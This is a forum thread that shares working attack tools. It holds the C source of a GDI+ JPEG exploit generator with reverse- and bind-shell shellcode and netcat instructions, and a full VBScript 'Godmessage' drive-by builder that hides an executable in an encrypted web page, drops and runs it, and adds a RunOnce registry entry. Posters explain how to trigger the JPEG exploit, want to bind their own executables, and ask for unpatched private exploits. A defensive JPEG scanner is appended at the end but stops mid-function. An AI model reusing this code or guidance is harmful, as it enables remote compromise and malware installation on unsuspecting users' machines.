"\xAE\x0E\x42\x97\x8D\x8C\x6D\xAE\x56\xB8\x26\xD8\x0F\xE3\x43\x93"
"\x73\x18\x75\x28\xD7\xF8\xD5\xFF\x00\x74\xE4\x18\xC2\x82\xAC\x6F"
"\x86\x7F\x2A\x4C\xBE\xE5\xFC\xD2\x22\xCC\x9A\x32\xD1\x7C\x7D\x68";
/* Code... */
unsigned char xor_data(unsigned char byte)
{
return(byte ^ 0x92);
}
void print_usage(char *prog_name)
{
printf(" Exploit Usage:\n");
printf("\t%s -r your_ip | -b [-p port] <jpeg_filename>\n\n", prog_name);
printf(" Parameters:\n");
printf("\t-r your_ip or -b\t Choose -r for reverse connect attack mode\n\t\t\t\t"
       " and choose -b for a bind attack. By default\n\t\t\t\t if you don't specify -r or"
       " -b then a bind\n\t\t\t\t attack will be generated.\n\n");
printf("\t-p (optional)\t\t This option will allow you to change the port \n\t\t\t\t"
       " used for a bind or reverse connect attack.\n\t\t\t\t If the attack mode is bind"
       " then the\n\t\t\t\t victim will open the -p port. If the attack\n\t\t\t\t mode"
       " is reverse connect then the port you\n\t\t\t\t specify will be the one you want"
       " to listen\n\t\t\t\t on so the victim can connect to you\n\t\t\t\t right away.\n\n");
printf(" Examples:\n");
printf("\t%s -r 68.6.47.62 -p 8888 test.jpg\n", prog_name);
printf("\t%s -b -p 1542 myjpg.jpg\n", prog_name);
printf("\t%s -b whatever.jpg\n", prog_name);
printf("\t%s -r 68.6.47.62 exploit.jpg\n\n", prog_name);
printf(" Remember if you use the -r option to have netcat listening\n");
printf(" on the port you are using for the attack so the victim will\n");
printf(" be able to connect to you when exploited...\n\n");
printf(" Example:\n");
printf("\tnc.exe -l -p 8888");
exit(-1);
}
int main(int argc, char *argv[])
{
FILE *fout;
unsigned int i = 0,j = 0;
int raw_num = 0;
unsigned long port = 1337; /* default port for bind and reverse attacks */
unsigned long encoded_port = 0;
unsigned long encoded_ip = 0;
unsigned char attack_mode = 2; /* bind by default */
char *p1 = NULL, *p2 = NULL;
char ip_addr[256];
char str_num[16];
char jpeg_filename[256];
WSADATA wsa;
printf(" +------------------------------------------------+\n");
printf(" | JpegOfDeath - Remote GDI+ JPEG Remote Exploit |\n");
printf(" | Exploit by John Bissell A.K.A. HighT1mes |\n");
printf(" | September, 23, 2004 |\n");
printf(" +------------------------------------------------+\n");
if (argc < 2)
print_usage(argv[0]);
/* process commandline */
for (i = 0; i < (unsigned) argc; i++) {
if (argv[i][0] == '-') {
switch (argv[i][1]) {
case 'r':
/* reverse connect */
strncpy(ip_addr, argv[i+1], 20);
attack_mode = 1;
break;
case 'b':
/* bind */
attack_mode = 2;
break;
case 'p':
/* port */
port = atoi(argv[i+1]);
break;
}
}
}
strncpy(jpeg_filename, argv[i-1], 255);
fout = fopen(argv[i-1], "wb");
if( !fout ) {
printf("Error: JPEG File %s Not Created!\n", argv[i-1]);
return(EXIT_FAILURE);
}
/* initialize the socket library */
if (WSAStartup(MAKEWORD(1, 1), &wsa) == SOCKET_ERROR) {
printf("Error: Winsock didn't initialize!\n");
exit(-1);
}
encoded_port = htonl(port);
encoded_port += 2;
if (attack_mode == 1) {
/* reverse connect attack */
reverse_shellcode[184] = (char) 0x90;
reverse_shellcode[185] = (char) 0x92;
reverse_shellcode[186] = xor_data((char)((encoded_port >> 16) & 0xff));
reverse_shellcode[187] = xor_data((char)((encoded_port >> 24) & 0xff));
p1 = strchr(ip_addr, '.');
strncpy(str_num, ip_addr, p1 - ip_addr);
raw_num = atoi(str_num);
reverse_shellcode[179] = xor_data((char)raw_num);
p2 = strchr(p1+1, '.');
strncpy(str_num, ip_addr + (p1 - ip_addr) + 1, p2 - p1);
raw_num = atoi(str_num);
reverse_shellcode[180] = xor_data((char)raw_num);
p1 = strchr(p2+1, '.');
strncpy(str_num, ip_addr + (p2 - ip_addr) + 1, p1 - p2);
raw_num = atoi(str_num);
reverse_shellcode[181] = xor_data((char)raw_num);
p2 = strrchr(ip_addr, '.');
strncpy(str_num, p2+1, 5);
raw_num = atoi(str_num);
reverse_shellcode[182] = xor_data((char)raw_num);
}
if (attack_mode == 2) {
/* bind attack */
bind_shellcode[204] = (char) 0x90;
bind_shellcode[205] = (char) 0x92;
bind_shellcode[191] = xor_data((char)((encoded_port >> 16) & 0xff));
bind_shellcode[192] = xor_data((char)((encoded_port >> 24) & 0xff));
}
/* build the exploit jpeg */
j = sizeof(header1) + sizeof(setNOPs1) + sizeof(header2) - 3;
for(i = 0; i < sizeof(header1) - 1; i++)
fputc(header1[i], fout);
for(i=0;i<sizeof(setNOPs1)-1;i++)
fputc(setNOPs1[i], fout);
for(i=0;i<sizeof(header2)-1;i++)
fputc(header2[i], fout);
for( i = j; i < 0x63c; i++)
fputc(0x90, fout);
j = i;
if (attack_mode == 1) {
for(i = 0; i < sizeof(reverse_shellcode) - 1; i++)
fputc(reverse_shellcode[i], fout);
}
else if (attack_mode == 2) {
for(i = 0; i < sizeof(bind_shellcode) - 1; i++)
fputc(bind_shellcode[i], fout);
}
for(i = i + j; i < 0x1000 - sizeof(setNOPs2) + 1; i++)
fputc(0x90, fout);
for( j = 0; i < 0x1000 && j < sizeof(setNOPs2) - 1; i++, j++)
fputc(setNOPs2[j], fout);
fprintf(fout, "\xFF\xD9");
fcloseall();
WSACleanup();
printf(" Exploit JPEG file %s has been generated!\n", jpeg_filename);
return(EXIT_SUCCESS);
}
And a Java drive-by would be ideal; I will look into that. Any info I may need would be favorable, and I would appreciate it greatly!
A ton of skiddies attempt Java drive-bys on a forum I used to frequent, www.sythe.org, so I assume it can't be too difficult.
A quick Google gave a ton of tutorial links from Hackforums, but unfortunately to view them you have to create an account (hence I haven't shared any links).
Here's another oldie-but-a-goodie "drive-by" which apparently still works, as I tested it out on my machine and it built the .exe on the fly and ran it in the temp folder with a single view of the infected web page... it uses Visual Basic Script, which IE will be able to parse.
Code:
'********************************************************************
' Godmessage IV Creator v0.4
' Author: 6IT
' Thanks: The Pull - Creator of the original Godmessage - this is his brain child.
' Thanks: StoneFisk - Coauthor of Godmessage IV.
' Thanks: To all the people who helped make godmessage what it is today
'
' CHANGE LOG 10-18-00
' - See Readme.txt
'********************************************************************
Option Explicit
Dim Message, Title, Text1
Dim fso, WSHSHell, exefile, htmlfile
Dim tStart, tElapsed
Dim timeout1, timeout2, timeout3
Dim state(255)
Dim key(255)
Message = "Enter the name of the executable to wrap in Godmessage IV"
Title = "6IT's Godmessage IV Creator v0.4"
Text1 = "Sorry, user input was canceled"
Set fso = CreateObject("Scripting.FileSystemObject")
Set WSHShell = CreateObject("WScript.Shell")
Const ForReading = 1
Const ForAppending = 8
exefile = InputBox(Message,Title,"onz.exe", 4000, 3000)
If exefile = "" Then
WScript.Echo Text1
WScript.Quit()
ElseIf exefile = "onz.exe" Then
If fso.FileExists(exefile) Then
GMCreate()
Else
WScript.Echo "File Doesn't Exist!"
WScript.Quit()
End If
Else
If fso.FileExists(exefile) Then
fso.CopyFile exefile, "onz.exe", True
GMCreate()
Else
WScript.Echo "File Doesn't Exist!"
WScript.Quit()
End If
End If
WScript.Echo "Success! and Elapsed time=" & tElapsed & " seconds"
WScript.Quit()
Sub GMCreate()
PrptHtmlFile()
PrptTimeouts()
Dim inputHtml, output
Set output = fso.CreateTextFile("Godmessage.html", True)
tStart = timer()
CheckSize()
CreateXXE()
inputHtml = Insert(htmlfile)
output.Write(InputHtml)
output.close
CryptHtml()
fso.DeleteFile "onz.xxe", True
tElapsed = timer()
tElapsed = tElapsed - tStart
End Sub
Sub PrptHtmlFile()
Dim MessHtml
MessHtml = "Please enter the filename for the html file."
htmlfile = InputBox(MessHtml,Title,"default.html", 4000, 3000)
If htmlfile = "" Then
WScript.Echo Text1
WScript.Quit()
ElseIf Not fso.FileExists(htmlfile) Then
WScript.Echo "File Doesn't Exist!"
WScript.Quit()
End If
End Sub
Sub PrptTimeouts()
Dim Message1, Message2, Message3
Message1 = "Enter the timeout for the 'Path' setProperty."
Message2 = "Enter the timeout for the 'Doc' setProperty."
Message3 = "Enter the timeout for the 'invoke' method."
timeout1 = InputBox(Message1,Title,"15", 4000, 3000)
timeout2 = InputBox(Message2,Title,"2000", 4000, 3000)
timeout3 = InputBox(Message3,Title,"2500", 4000, 3000)
End Sub
Sub CheckSize()
Dim fs, fsize
Set fs = fso.GetFile("onz.exe")
fsize = fs.Size
If fsize > 34500 Then
WScript.Echo "File is Greater Than 34500 Bytes"
WScript.Quit()
End If
End Sub
Sub CreateXXE()
If fso.FileExists("onz.xxe") Then
fso.DeleteFile "onz.xxe", True
End If
WSHShell.Run "%comspec% /c xxencode.com onz.exe",0,True
End Sub
Function Insert(html)
Dim f1, i, s, strBdy
Dim regExBdy, retValBdy, retStrBdy
ReDim htmlArr(-1)
Set f1 = fso.OpenTextFile(html, ForReading)
i = 0
Do While NOT f1.AtEndOfStream
s = f1.ReadLine
Set regExBdy = New RegExp
regExBdy.Pattern = "<BODY"
regExBdy.IgnoreCase = True
retValBdy = regExBdy.Test(s)
If retValBdy Then
Dim regExOnL, retValOnL, retStrOnL
Dim MatchOnL, MatchesOnL, MatchBdy, MatchesBdy
Set regExOnL = New RegExp
regExOnL.Pattern = "onLoad="
regExOnL.IgnoreCase = True
retValOnL = regExOnL.Test(s)
If retValOnL Then
Set MatchesOnL = regExOnL.Execute(s)
For Each MatchOnL in MatchesOnL
retStrOnL = MatchOnL.FirstIndex
Next
strBdy = Left(s, retStrOnL + 8) & "f(); " & Right(s, Len(s)-(retStrOnL + 8))
s = strBdy
Else
Set MatchesBdy = regExBdy.Execute(s)
For Each MatchBdy in MatchesBdy
retStrBdy = MatchBdy.FirstIndex
Next
strBdy = Left(s, retStrBdy + 5) & " onLoad=""f()"" " & Right(s, Len(s)-(retStrBdy + 5))
s = strBdy
End If
End If
Dim regExEnd, retValEnd, retStrEnd, MatchEnd, MatchesEnd
Set regExEnd = New RegExp
regExEnd.Pattern = "</BODY>"
regExEnd.IgnoreCase = True
retValEnd = regExEnd.Test(s)
If retValEnd Then
Set MatchesEnd = regExEnd.Execute(s)
For Each MatchEnd in MatchesEnd
retStrEnd = MatchEnd.FirstIndex
Next
strBdy = Left(s, retStrEnd) & GenHtml() & Right(s, Len(s)-(retStrEnd))
s = strBdy
End If
ReDim preserve htmlArr(i)
htmlArr(i) = s
i = i + 1
Loop
f1.Close
Insert = Join(htmlArr, vbNewline)
End Function
Function StartHtml(setTimeout1, setTimeout2, setTimeout3)
Dim html(16)
html(1) = "<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>"
html(2) = "<SCRIPT language=JAVASCRIPT>"
html(3) = "a1=document.applets[0];"
html(4) = "fn=""..\\\\Start Menu\\\\Programs\\\\Startup\\\\EA.HTA"";"
html(5) = "function f(){"
html(6) = "cl=""{06290BD5-48AA-11D2-8432-006008C3FBFC}"";"
html(7) = "a1.setCLSID(cl);"
html(8) = "a1.createInstance();"
html(9) = "setTimeout(""a1.setProperty('Path','""+fn+""')""," & setTimeout1 & ");"
html(10) = "setTimeout(""a1.setProperty('DOC',doc)""," & setTimeout2 & ");"
html(11) = "setTimeout(""a1.invoke('write',VA)""," & setTimeout3 & ");}"
html(12) = "</SCRIPT><SCRIPT language=VBSCRIPT>"
html(13) = "Option Explicit"
html(14) = "Dim VA, doc"
html(15) = "VA = ARRAY()"
HTML(16) = ""
StartHtml = Join(html, vbNewline)
End Function
Function EncodeXXE()
Dim Input, nline, nl, s, a
Dim fLine1, fLine2, fLine
Set input = fso.OpenTextFile("onz.xxe", ForReading)
nLine = " & vbNewline"
nl = " & Chr(13) & Chr(10) & "
s = input.ReadLine
fLine1 = "set onzXxe=fso.CreateTextFile(" & Chr(34) & Chr(34) & "onz.xxe" & Chr(34) & Chr(34) & ")"""
fLine2 = """onzXxe.WriteLine " & Chr(34) & Chr(34) & s & Chr(34) & Chr(34)
ReDim ca(-1)
redim preserve ca(0)
ca(0) = fLine1
redim preserve ca(1)
ca(1) = nl
redim preserve ca(2)
ca(2) = fLine2
redim preserve ca(3)
ca(3) = nLine
a = 4
Do While NOT input.AtEndOfStream
ReDim preserve ca(a)
s = input.ReadLine
If s = "" Then
ca(a) = nLine
Else
fLine = " & " & Chr(34) & Chr(34) & s & Chr(34) & Chr(34)
ca(a) = fLine & nLine
End If
a = a+1
Loop
ReDim preserve ca(a)
ca(a) = Chr(34) & nl & """onzXxe.close""" & nl & Chr(34)
input.Close
EncodeXXE = Join(ca, "")
End Function
Function GenHtml()
Dim nl, htmlEnd, htmlstart, f1
nl = Chr(34) & " & Chr(13) & Chr(10) & " & Chr(34)
Dim ar1(5), ar2(11), data(5)
ar1(0) = "Chr(13) & Chr(10) & ""<SCRIPT language=VBSCRIPT>" & nl
ar1(1) = "Set fso = CreateObject(""""Scripting.FileSystemObject"""")" & nl
ar1(2) = "Set WshShell = CreateObject(""""WScript.Shell"""")" & nl
ar1(3) = "set xxDecSrc=fso.CreateTextFile(""""xxdecode.src"""")" & nl
ar1(4) = "xxDecSrc.WriteLine """"n xxdecode.com"""" & vbNewline & """"e 100 E9 A7 0 49 6E 70 75 74 20 66 69 6C 65 20 65 72 """" & vbNewline & """"e 110 72 6F 72 2E D A 4F 75 74 70 75 74 20 66 69 6C """" & vbNewline & """"e 120 65 20 65 72 72 6F 72 2E D A 73 74 61 72 74 20 """" & vbNewline & """"e 130 6E 6F 74 20 66 6F 75 6E 64 2E D A 45 6E 64 20 """" & vbNewline & """"e 140 6E 6F 74 20 66 6F 75 6E 64 2E D A 65 78 69 73 """" & vbNewline & """"e 150 74 73 2E 20 41 62 6F 72 74 69 6E 67 21 D A 0 """" & vbNewline & """"e 160 0 0 0 EA 3 EA 3 9A 3 0 2B 2D 30 31 32 33 """" & vbNewline & """"e 170 34 35 36 37 38 39 41 42 43 44 45 46 47 48 49 4A """" & vbNewline & """"e 180 4B 4C 4D 4E 4F 50 51 52 53 54 55 56 57 58 59 5A """" & vbNewline & """"e 190 61 62 63 64 65 66 67 68 69 6A 6B 6C 6D 6E 6F 70 """" & vbNewline & """"e 1A0 71 72 73 74 75 76 77 78 79 7A E8 F0 1 E8 62 1 """" & vbNewline & """"e 1B0 BF 9A 3 E8 EF 0 AD 3D 62 65 75 F4 AD 3D 67 69 """" & vbNewline & """"e 1C0 75 EE AD 3D 6E 20 75 E8 BF 9A 3 AC 3A C4 76 FB """" & vbNewline & """"e 1D0 AC 3A C4 75 FB AC 3A C4 76 FB 3A C4 74 4 AA AC """" & vbNewline & """"e 1E0 EB F8 BA 9A 3 33 C9 88 D 80 3E 69 1 FF 74 20 """" & vbNewline & """"e 1F0 B4 4E CD 21 3C 2 74 18 3C 12 74 14 8B CF 2B CA """" & vbNewline & """"e 200 49 49 E8 3B 1 BA 4C 1 B9 13 0 B0 5 E9 24 1 """" & vbNewline & """"e 210 B4 3C CD 21 73 3 E9 F1 0 A3 61 1 BF 9A 3 E8 """" & vbNewline & """"e 220 83 0 8A 4 A C0 74 65 3C 2B 74 61 3C 20 74 5D """" & vbNewline & """"e 230 57 BB 6A 1 BA 40 0 56 AC A C0 74 12 8B FB 8B """" & vbNewline & """"e 240 CA F2 AE 75 45 8B C7 48 2B C3 88 44 FF EB E9 5E """" & vbNewline & """"e 250 5F AC 32 E4 8B E8 B9 4 6 AD 86 C4 8A D0 D0 E4 """" & vbNewline & """"e 260 D0 E4 D2 E8 A C4 AA 4D 74 B5 8A E2 AC 8A D0 D2 """" & vbNewline & """"e 270 E4 D0 E8 D0 E8 A C4 AA 4D 74 A4 8A E2 AC 8A CD """" & vbNewline & """"e 280 D2 E4 A C4 AA 4D 75 CE EB 95 E9 A1 0 E8 15 0 """" & vbNewline & """"e 290 AD 3D 65 6E 75 5 AC 3C 64 74 3 E8 9C 0 E8 51 """" 
& vbNewline & """"e 2A0 0 B4 4C CD 21 8B 36 63 1 89 3E 67 1 BD 43 0 """" & vbNewline & """"e 2B0 BF 4A 3 C6 5 0 3B 36 65 1 72 6 E8 33 0 E8 """" & vbNewline & """"e 2C0 50 0 AC 3C D 74 1B 3C A 74 18 AA 4D 75 E7 3B """" & vbNewline & """"e 2D0 36 65 1 72 3 E8 3A 0 AC 3C A 75 F2 BF 9A 3 """" & vbNewline & """"e 2E0 EB C7 46 C6 5 0 89 36 63 1 8B 3E 67 1 BE 4A """" & vbNewline & """"e 2F0 3 C3 BA 9A 3 8B CA 87 E 67 1 2B CA 76 A 8B """" & vbNewline & """"e 300 1E 61 1 B4 40 CD 21 72 1 C3 BA 16 1 B9 14 0 """" & vbNewline & """"e 310 EB 22 BA EA 3 B9 0 E1 8B 1E 5F 1 B4 3F CD 21 """" & vbNewline & """"e 320 72 C B C0 74 8 8B F2 3 C6 A3 65 1 C3 BA 3 """" & vbNewline & """"e 330 1 B9 13 0 E8 9 0 E9 67 FF BA 3C 1 B9 10 0 """" & vbNewline & """"e 340 50 BB 2 0 B4 40 CD 21 58 C3 54 68 69 73 20 70 """" & vbNewline & """"e 350 72 6F 67 72 61 6D 20 72 65 71 75 69 72 65 73 20 """" & vbNewline & """"e 360 44 4F 53 20 56 65 72 73 69 6F 6E 20 32 2E 30 20 """" & vbNewline & """"e 370 6F 72 20 68 69 67 68 65 72 2E D A 24 D A 49 """" & vbNewline & """"e 380 6E 70 75 74 20 70 61 74 68 2F 66 69 6C 65 3A 20 """" & vbNewline & """"e 390 20 4E 6F 20 61 63 74 69 6F 6E D A 24 B4 30 CD """" & vbNewline & """"e 3A0 21 3C 2 73 C BA 4A 3 B4 9 CD 21 B8 1 4C CD """" & vbNewline & """"e 3B0 21 E8 36 0 73 23 BA 7D 3 B9 14 0 BB 2 0 B4 """" & vbNewline & """"e 3C0 40 CD 21 BF 7F 0 C6 5 50 8B D7 B4 A CD 21 E8 """" & vbNewline & """"e 3D0 18 0 73 5 BA 91 3 EB CF BA 2C 4 B8 0 3D CD """" & vbNewline & """"e 3E0 21 72 4 A3 5F 1 C3 E9 44 FF BE 80 0 BF 2C 4 """" & vbNewline & """"e 3F0 FC AC A C0 74 2F B4 20 AC 3A C4 76 FB 3C 2F 74 """" & vbNewline & """"e 400 4 3C 2D 75 18 8B D0 8B 4 24 5F 3D 4F 20 8B C2 """" & vbNewline & """"e 410 75 B F6 16 69 1 46 46 AC 3A C4 76 A AA AC EB """" & vbNewline & """"e 420 F8 3A C4 76 2 F9 C3 C6 5 0 F8 C3 58 58 44 20 """" & vbNewline & """"e 430 76 31 2E 31 0 44 61 76 69 64 20 50 20 4B 69 72 """" & vbNewline & """"e 440 73 63 68 62 61 75 6D 2C 20 54 6F 61 64 20 48 61 """" & 
vbNewline & """"e 450 6C 6C 0 0 """" & vbNewline & """"rcx"""" & vbNewline & """"353"""" & vbNewline & """"w"""" & vbNewline & """"q"""" & vbNewline" & nl
ar1(5) = "xxDecSrc.close" & nl
ar2(0) = "WshShell.Run """"%comspec% /c debug < xxdecode.src"""",0,True" & nl
ar2(1) = "WshShell.Run """"%comspec% /c xxdecode.com onz.xxe"""",0,True" & nl
ar2(2) = "WshShell.Run """"%comspec% /c move onz.exe %windir%\onz.exe"""",0,True" & nl
ar2(3) = "WshShell.Run """"%comspec% /c start %windir%\onz.exe"""",0,False" & nl
ar2(4) = "fso.DeleteFile """"xxdecode.src"""", True" & nl
ar2(5) = "fso.DeleteFile """"onz.xxe"""", True" & nl
ar2(6) = "fso.DeleteFile """"xxdecode.com"""", True" & nl
ar2(7) = "strStartup = WshShell.SpecialFolders(""""Startup"""")" & nl
ar2(8) = "sysCmd = WshShell.ExpandEnvironmentStrings(""""%COMSPEC%"""")" & nl
ar2(9) = "regCmd = sysCmd & """" /c del """" & Chr(34) & strStartup & """"\ea.hta"""" & Chr(34)" & nl
ar2(10) = "WshShell.RegWrite """"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce\clean"""", regCmd" & nl
ar2(11) = "<"" & Chr(47) & ""SCRIPT><BODY onload=""""javascript: window.close()""""><"" & Chr(47) & ""BODY>"
data(0) = StartHtml(timeout1, timeout2, timeout3)
data(1) = "doc = " & Join(ar1, "")
data(2) = EncodeXXE()
data(3) = Join(ar2, "") & Chr(34)
data(4) = vbNewline
data(5) = "</SCRIPT>"
GenHtml = Join(data, "")
End Function
Sub CryptHtml()
Dim f1, f2, text, enc, eKey, html
Set f1 = fso.OpenTextFile("godmessage.html", ForReading)
Set f2 = fso.CreateTextFile("Godmessage.HexEnc.html", True)
eKey = RandPwd()
text = f1.ReadAll
enc = EnCryptHex(text, eKey)
html = WrapEnc(enc, eKey)
f2.Write html
f1.Close
f2.Close
End Sub
Sub RC4Initialize(strPwd)
Dim tempSwap, i, f, intLength
intLength = len(strPwd)
For i = 0 To 255
key(i) = asc(mid(strPwd, (i mod intLength)+1, 1))
state(i) = i
Next
f = 0
For i = 0 To 255
f = (f + state(i) + key(i)) Mod 256
tempSwap = state(i)
state(i) = state(f)
state(f) = tempSwap
Next
End Sub
Function EnCryptHex(plaintxt, psw)
Dim temp, a, i, f, k, cipherby
dim cipher()
redim cipher(-1)
i = 0
f = 0
RC4Initialize(psw)
For a = 1 To Len(plaintxt)
i = (i + 1) Mod 256
f = (f + state(i)) Mod 256
temp = state(i)
state(i) = state(f)
state(f) = temp
k = (state(i) + state(f)) Mod 256
cipherby = Asc(Mid(plaintxt, a, 1)) Xor k
If cipherby = 0 then cipherby = Asc(Mid(plaintxt, a, 1))
If cipherby < 16 Then
cipherby = "0" & CStr(Hex(cipherby))
Else
cipherby = Hex(cipherby)
End If
redim preserve cipher(a-1)
cipher(a-1) = cipherby
Next
EnCryptHex = join( cipher, "")
End Function
Function RandPwd()
Dim i, x
ReDim pwdar(-1)
Randomize
For i = 0 To 31
ReDim preserve pwdar(i)
pwdar(i) = Chr(Int((122 - 42 + 1) * Rnd + 42))
Next
RandPwd = Join(pwdar, "")
End Function
Function WrapEnc(encText, encKey)
Dim encHtml(48)
encHtml(0) = "Option Explicit"
encHtml(1) = "Dim o, p, d, t, key(255), state(255)"
encHtml(2) = "p = """ & encKey & Chr(34)
encHtml(3) = "d = """ & encText & Chr(34) & vbNewline
encHtml(4) = "o = DeCryptHex(d, p)"
encHtml(5) = "t = setTimeout(""go()"", 500)"
encHtml(6) = "Sub go()"
encHtml(7) = "Document.Write o"
encHtml(8) = "Document.execCommand(""Refresh"")"
encHtml(9) = "End Sub"
encHtml(10) = "Sub RC4Initialize(strPwd)"
encHtml(11) = "Dim tempSwap, i, f, intLength"
encHtml(12) = "intLength = len(strPwd)"
encHtml(13) = "For i = 0 To 255"
encHtml(14) = "key(i) = asc(mid(strPwd, (i mod intLength)+1, 1))"
encHtml(15) = "state(i) = i"
encHtml(16) = "Next"
encHtml(17) = "f = 0"
encHtml(18) = "For i = 0 To 255"
encHtml(19) = "f = (f + state(i) + key(i)) Mod 256"
encHtml(21) = "tempSwap = state(i)"
encHtml(22) = "state(i) = state(f)"
encHtml(23) = "state(f) = tempSwap"
encHtml(24) = "Next"
encHtml(25) = "End Sub"
encHtml(26) = "Function DeCryptHex(hextext, psw)"
encHtml(27) = "Dim temp, a, x, i, f, k, cipherby"
encHtml(28) = "dim cipher()"
encHtml(29) = "redim cipher(-1)"
encHtml(30) = "x = 0"
encHtml(31) = "i = 0"
encHtml(32) = "f = 0"
encHtml(33) = "Call RC4Initialize(psw)"
encHtml(34) = "For a = 1 To Len(hextext) Step 2"
encHtml(35) = "i = (i + 1) Mod 256"
encHtml(36) = "f = (f + state(i)) Mod 256"
encHtml(37) = "temp = state(i)"
encHtml(38) = "state(i) = state(f)"
encHtml(39) = "state(f) = temp"
encHtml(40) = "k = (state(i) + state(f)) Mod 256"
encHtml(41) = "cipherby = Asc(Chr(Eval(""&H"" & Mid(hextext, a, 2)))) Xor k"
encHtml(42) = "if cipherby = 0 then cipherby = Asc(Chr(Eval(""&H"" & Mid(hextext, a, 2))))" & vbNewline
encHtml(43) = "redim preserve cipher(x)"
encHtml(44) = "cipher(x) = Chr(cipherby)"
encHtml(45) = "x = x + 1"
encHtml(46) = "Next"
encHtml(47) = "DeCryptHex = join( cipher, """")"
encHtml(48) = "End Function"
WrapEnc = "<Script Language=VBScript>" & vbNewLine & Join(encHtml, " : ") & vbNewLine & "</SCRIPT>"
End Function
Thanks spectraL, I just read over the drive-by script; it's surprisingly a simple exploit. I'd like to migrate it to JavaScript/ECMA if it could still run the exploit that way, but I'm unsure if those will have shell access. I still don't completely understand the JPEG one due to the strange hex, but that last one, I'll try out later on today to see if I can get it to do what I need. I'll be updating that script as well and will post my version after I fuck with it later on or tomorrow, for whoever is interested.
Quote:
Originally Posted by ThunderDownUnder
A ton of skiddies attempt Java drive-bys on a forum I used to frequent, www.sythe.org, so I assume it can't be too difficult.
A quick Google gave a ton of tutorial links from Hackforums, but unfortunately to view them you have to create an account (hence I haven't shared any links).
Yes, I have found a few, but I'm more interested in just hearing a sentence on how the exploit works and then writing it myself. I have my methods I've used in the past, and that usually includes social engineering a group of people with 2 bound files, but I decided about a year ago that I do not use any programs for hacking that were written by somebody else; I barely use code libraries because it feels like a cheat. I will attempt to rewrite the 2 spectraL gave me and reverse engineer a bit to find the main exploit, not all the surrounding nonsense.
Also, any good hacking boards on tor not full of skiddys or faggots that think they are part of anonymous because they download ddos tools?
(I say Tor because most I have found are what I stated above, and I have not looked on Tor, but that seems like a good place.)
...I still don't completely understand the JPEG one due to the strange hex...
What it does, when compiled, is provide you a small program which you can use to create a .jpg file which is injected with a small executable file and download URL into the preview area of the .jpg. It also injects the commands to run that executable file when the mouse hovers over the .jpg to retrieve the preview. Just opening the folder that the infected .jpg is in will trigger the preview action and cause the executable to be started. That embedded executable file is pre-configured to perform a connect-back download and autorun from any URL (where a larger executable file is waiting to be downloaded and run by the smaller executable embedded in the .jpg). The hex code is the smaller executable in shellcode which gets injected into the .jpg file. This still works flawlessly on WinXP with Service Pack 3. The only issue with it is that the infected .jpg file needs to be previewed on the LOCAL MACHINE; it will not work if just previewed remotely. You would have to get the user to download the .jpg and then hover their mouse over it, or drag it, copy it, move it, rename it, delete it, or even just open a folder that it is in.
Yes, I saw that, and OK, the hex is the actual exe; I meant I couldn't understand the code itself. I get what the program does, but I like to understand the entire code, and not just how it works but why, so I could rewrite it to fit my needs, and based on what you said you helped me to reverse engineer it. I wanted to SEE the exploit, I guess you would say, and I figured it out. I will post up a commented version of the code with the deciphered hex and explanations of the shell commands, just for any other programmers out there that could use the exploit in their own applications. My goal is to change this to use the exploit to bind directly with an exe of my choosing, and I'm sure I can do it now knowing this exploit. When I get around to it I will write that for whoever is interested.
spectraL.. a million thanks, it's not going to waste... I do have one question: would the exploit still work if the icon is displayed in gallery view by opening the folder? I'm pretty sure it would; if that's the case this would work perfectly in a cookie exploit where you can navigate temp internet files from the current domain... I have seen that somewhere, so then the user would not have to download anything?
Also, will this infect my server when the client's browser requests the file if it was on a website? This could be a problem...
Anything which can trigger the preview on the local machine will create the buffer overflow and then start the embedded executable code and the auto-download process. It will not work if previewing the .jpg from a remote location. And if the .jpg is only auto-downloaded to the local temp files folder then the local user would have to actually browse to that folder and preview the file there. No, your own machine doesn't get infected when you serve the infected .jpg to visitors.
That is the unescaped decoded shellcode in the JPEG exploit. I just realised that's the whole point of the exploit. Basically it saves a variable, which goes into the heap. Once called from the heap it is reassigned a new allocated set of RAM to reposition the heap; it then exploits the old heap and throws this in its place. I know a bit of assembler, but I hate bitwise operators and I've never fully grasped the concept of them, nor have I really tried or had a need to since I'm using pretty mid-level languages.
Haha, I just can't seem to see how this was able to slide the heap. I don't see anywhere a buffer overflow would occur, but it has to be there; then again I don't know assembler and I hate machine-level bit manipulation.... I need to start learning. I'll try and have it down in the next few days; it has to be pretty easy, not to write exploits, but to learn basic commands. But if you know assembler, my hat goes off to you. That does not happen often due to the size of any good programmer's ego. Don't deny it. All in good fun haha
Know any places to find some good private exploits that wouldn't be patched? I used to be a member of an invite-only forum where you start with 0 downloads; every time you upload an exploit, application or script, you would get one download for everybody that downloaded yours and gave it above an 80% rating. It was a great site but got shut down. That way exploits could still be shared privately and safely, but only to people that would be able to use them but did not rely on other people's hard work to "hack" (hate that word), and find ways to develop them and release their own developments. Sadly it was shut down about 5 years ago. I still have a huge folder of all these apps and exploits, but most are irrelevant now since it was so long ago.
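The buffer overflow the post above goes looking for is not in the shellcode but in how the old GDI+ JPEG parser handled one header field: a segment's 16-bit length counts its own two bytes, the parser subtracted 2 in unsigned arithmetic, and a COM segment declaring length 0 or 1 wrapped into an enormous copy. Added example for defenders, not code from the thread or from the tool's author: a scanner that walks a file's marker segments and flags that underflow shape and data appended after EOI, with constructed sample inputs inline.

```python
import struct
from dataclasses import dataclass, field

# Marker codes (the byte that follows the 0xFF prefix).
SOI, EOI, SOS, COM = 0xD8, 0xD9, 0xDA, 0xFE
# Markers that carry no length field: SOI, EOI, TEM and RST0..RST7.
STANDALONE = {SOI, EOI, 0x01} | set(range(0xD0, 0xD8))


@dataclass
class Finding:
    offset: int   # byte offset of the 0xFF prefix the finding relates to
    marker: int   # marker code, 0 when no marker applies
    reason: str


@dataclass
class Report:
    segments: list = field(default_factory=list)  # (offset, marker, declared length)
    findings: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.findings)


def _skip_entropy_coded(data: bytes, pos: int) -> int:
    """Advance past scan data to the next real marker (0xFF not followed by 0x00 or RSTn)."""
    while pos + 1 < len(data):
        nxt = data[pos + 1]
        if data[pos] == 0xFF and nxt != 0x00 and not 0xD0 <= nxt <= 0xD7:
            return pos
        pos += 1
    return len(data)


def scan_jpeg(data: bytes) -> Report:
    """Walk the marker segments of a JPEG and report structural red flags."""
    rep = Report()
    if data[:2] != b"\xFF\xD8":
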